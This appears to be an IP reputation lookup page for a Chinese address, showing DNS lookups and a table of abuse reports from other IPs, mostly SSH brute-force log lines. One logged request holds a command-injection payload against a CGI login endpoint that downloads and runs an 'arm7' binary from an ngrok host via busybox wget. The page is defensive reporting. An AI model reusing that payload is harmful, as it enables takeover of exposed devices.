103.45.248.20 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
103.45.248.45	attack	Unauthorized connection attempt detected from IP address 103.45.248.45 to port 1433	2019-12-31 06:55:27

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 103.45.248.20
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 59359
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;103.45.248.20.			IN	A

;; AUTHORITY SECTION:
.			496	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022041001 1800 900 604800 86400

;; Query time: 27 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Apr 11 07:12:17 CST 2022
;; MSG SIZE  rcvd: 106

Host info

Host 20.248.45.103.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 20.248.45.103.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
222.186.180.8	attackbots	Apr 11 16:31:55 server sshd[52688]: Failed none for root from 222.186.180.8 port 22412 ssh2 Apr 11 16:31:57 server sshd[52688]: Failed password for root from 222.186.180.8 port 22412 ssh2 Apr 11 16:32:00 server sshd[52688]: Failed password for root from 222.186.180.8 port 22412 ssh2	2020-04-11 22:33:17
139.155.21.186	attackspambots	Apr 11 20:35:15 webhost01 sshd[16061]: Failed password for root from 139.155.21.186 port 42172 ssh2 ...	2020-04-11 21:58:10
58.221.84.90	attackbots	Apr 11 09:15:10 ws12vmsma01 sshd[61511]: Failed password for root from 58.221.84.90 port 34572 ssh2 Apr 11 09:17:50 ws12vmsma01 sshd[61893]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.221.84.90 user=root Apr 11 09:17:52 ws12vmsma01 sshd[61893]: Failed password for root from 58.221.84.90 port 48168 ssh2 ...	2020-04-11 22:48:46
190.56.229.42	attackspam	Apr 11 14:31:52 vps647732 sshd[11556]: Failed password for root from 190.56.229.42 port 36688 ssh2 ...	2020-04-11 21:58:36
190.166.252.202	attackspambots	Apr 11 14:19:11 debian64 sshd[1552]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.166.252.202 Apr 11 14:19:12 debian64 sshd[1552]: Failed password for invalid user custserv from 190.166.252.202 port 59420 ssh2 ...	2020-04-11 22:11:11
178.154.200.38	attack	[Sat Apr 11 19:19:16.606257 2020] [:error] [pid 7944:tid 139985705707264] [client 178.154.200.38:46852] [client 178.154.200.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/owasp-modsecurity-crs-3.2.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "696"] [id "920350"] [msg "Host header is a numeric IP address"] [data "103.27.207.197"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "103.27.207.197"] [uri "/"] [unique_id "XpG1xMkz5Lc7f6enOkJElgAAAh0"] ...	2020-04-11 22:09:10
222.186.180.142	attackspam	Apr 11 16:19:38 plex sshd[10079]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.180.142 user=root Apr 11 16:19:41 plex sshd[10079]: Failed password for root from 222.186.180.142 port 56585 ssh2	2020-04-11 22:32:45
2.63.121.194	attackspambots	1586607576 - 04/11/2020 14:19:36 Host: 2.63.121.194/2.63.121.194 Port: 445 TCP Blocked	2020-04-11 21:56:24
170.84.209.222	attackspambots	Apr 11 10:21:19 vps46666688 sshd[19453]: Failed password for root from 170.84.209.222 port 47198 ssh2 ...	2020-04-11 22:40:00
219.233.49.236	attackbotsspam	DATE:2020-04-11 14:19:04, IP:219.233.49.236, PORT:1433 MSSQL brute force auth on honeypot server (epe-honey1-hq)	2020-04-11 22:27:42
122.176.27.136	attackspambots	122.176.27.136 - - \[11/Apr/2020:15:52:00 +0300\] "POST /cgi-bin/mainfunction.cgi\?action=login\&keyPath=%27%0A/bin/sh$\{IFS\}-c$\{IFS\}'cd$\{IFS\}/tmp\;$\{IFS\}rm$\{IFS\}-rf$\{IFS\}arm7\;$\{IFS\}busybox$\{IFS\}wget$\{IFS\}http://19ce033f.ngrok.io/arm7\;$\{IFS\}chmod$\{IFS\}777$\{IFS\}arm7\;$\{IFS\}./arm7'%0A%27\&loginUser=a\&loginPwd=a HTTP/1.1" 400 150 "-" "-" ...	2020-04-11 22:42:22
172.69.33.229	attackspambots	$f2bV_matches	2020-04-11 21:57:14
222.186.180.9	attack	port scan and connect, tcp 22 (ssh)	2020-04-11 22:40:53
91.190.235.147	attack	20/4/11@08:19:06: FAIL: Alarm-Network address from=91.190.235.147 ...	2020-04-11 22:17:18
37.252.91.123	attackbotsspam	Automatic report - XMLRPC Attack	2020-04-11 22:36:27

Recently Reported IPs

103.45.230.131	103.45.248.235	103.45.248.76	103.45.249.246
103.45.65.25	103.45.98.195	103.46.136.29	103.46.140.227
103.46.210.114	103.46.218.16	103.46.218.21	103.47.113.79
103.47.14.38	103.47.29.37	103.47.54.30	103.47.54.62
103.47.64.33	103.47.82.84	103.48.168.50	103.48.194.218